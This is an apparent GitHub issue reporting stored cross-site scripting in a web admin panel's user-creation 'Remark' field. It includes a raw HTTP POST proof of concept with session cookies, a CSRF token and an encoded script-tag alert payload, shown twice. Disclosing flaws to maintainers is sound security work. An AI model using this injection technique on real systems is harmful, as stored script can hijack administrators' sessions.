We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add users in the background - there is xss in the remarks poc ` POST /Manager/AddOrModify/ HTTP/1.1 Host: 192.168.3.129:10027 Content-Length: 141 Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 X-CSRF-TOKEN-yilezhu: CfDJ8HxjCh0oOylDk40Utlg0kuVkHkyELbXkZ591U7-GfIexTnaoBJzXqAaXjoA5H3C6gvRNVVZEsvzH4kjo2ex7nqwNN0zp9AjetYdYquuFK7OiIvPLuLCjm4sSuQ-tFZQWY7sawRxuxp0hXS1vl2F2fEbDNZqWAkZswhhRnETzIfgvA0L2c1wlwu8Hd9iZzyK69g Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.3.129:10027 Referer: http://192.168.3.129:10027/Manager/AddOrModify/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuW5c6KKu3Hv3_AeZn_Eqz8FiekY-PyIkH57GfSaUX3CuNVAmpSx5KYdBHFWTuuZ-4BQgxoxIX-oBg8oGsWBgJqNKg-5d6xyMsDYpqosZkkNHB18dkAC6C5lh94kPv7Wq3aWf-jFp_ZA5K71nfIvbrHehMSum9bKmVeg44omCGGAfG0YgEYBwT4gQIM-DpQ8ihzLTAJ_CQVOQdWa3FUhulnMO80mKlyNt315-by3Bu-JaP9xkCYxJuuIpqUP8BQbZ19jfrISdQWgPMpbdvHRhmEbzjX8Ch5Y8dVgNgZiyL2S6mNtmuszsosdCdJ39sThpNbVwOvZ-giceXwRRzHBSvj9JlLkxIRQliWExonSpQRZTGt0aSyGXuLEIplNn7cEvwuxOLb_MWsD5qSqhRm30XW5QYXB_kikRurj2XX18q4PN7ISmAyxutiFGyQVY9HbBEqQG92SPxPXP5-8ug6DAc7994R-XPDTkQTU9FTBG9O_6ddLFFqDVZpf6CS3byZDAkRL9N5-k7soot2QEDCiqGqz Connection: close
Id=&UserName=123aaaa&RoleId=1&NickName=12323a&Mobile=13322133321&Email=1%40xx.com&IsLock=false&Remark=%3Cscript%3Ealert(11111)%3C%2Fscript%3E `
then in background exploit xss success
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Add users in the background - there is xss in the remarks
poc
`
POST /Manager/AddOrModify/ HTTP/1.1
Host: 192.168.3.129:10027
Content-Length: 141
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
X-CSRF-TOKEN-yilezhu: CfDJ8HxjCh0oOylDk40Utlg0kuVkHkyELbXkZ591U7-GfIexTnaoBJzXqAaXjoA5H3C6gvRNVVZEsvzH4kjo2ex7nqwNN0zp9AjetYdYquuFK7OiIvPLuLCjm4sSuQ-tFZQWY7sawRxuxp0hXS1vl2F2fEbDNZqWAkZswhhRnETzIfgvA0L2c1wlwu8Hd9iZzyK69g
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.129:10027
Referer: http://192.168.3.129:10027/Manager/AddOrModify/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuW5c6KKu3Hv3_AeZn_Eqz8FiekY-PyIkH57GfSaUX3CuNVAmpSx5KYdBHFWTuuZ-4BQgxoxIX-oBg8oGsWBgJqNKg-5d6xyMsDYpqosZkkNHB18dkAC6C5lh94kPv7Wq3aWf-jFp_ZA5K71nfIvbrHehMSum9bKmVeg44omCGGAfG0YgEYBwT4gQIM-DpQ8ihzLTAJ_CQVOQdWa3FUhulnMO80mKlyNt315-by3Bu-JaP9xkCYxJuuIpqUP8BQbZ19jfrISdQWgPMpbdvHRhmEbzjX8Ch5Y8dVgNgZiyL2S6mNtmuszsosdCdJ39sThpNbVwOvZ-giceXwRRzHBSvj9JlLkxIRQliWExonSpQRZTGt0aSyGXuLEIplNn7cEvwuxOLb_MWsD5qSqhRm30XW5QYXB_kikRurj2XX18q4PN7ISmAyxutiFGyQVY9HbBEqQG92SPxPXP5-8ug6DAc7994R-XPDTkQTU9FTBG9O_6ddLFFqDVZpf6CS3byZDAkRL9N5-k7soot2QEDCiqGqz
Connection: close
Id=&UserName=123aaaa&RoleId=1&NickName=12323a&Mobile=13322133321&Email=1%40xx.com&IsLock=false&Remark=%3Cscript%3Ealert(11111)%3C%2Fscript%3E
`
then in background exploit xss success
The text was updated successfully, but these errors were encountered: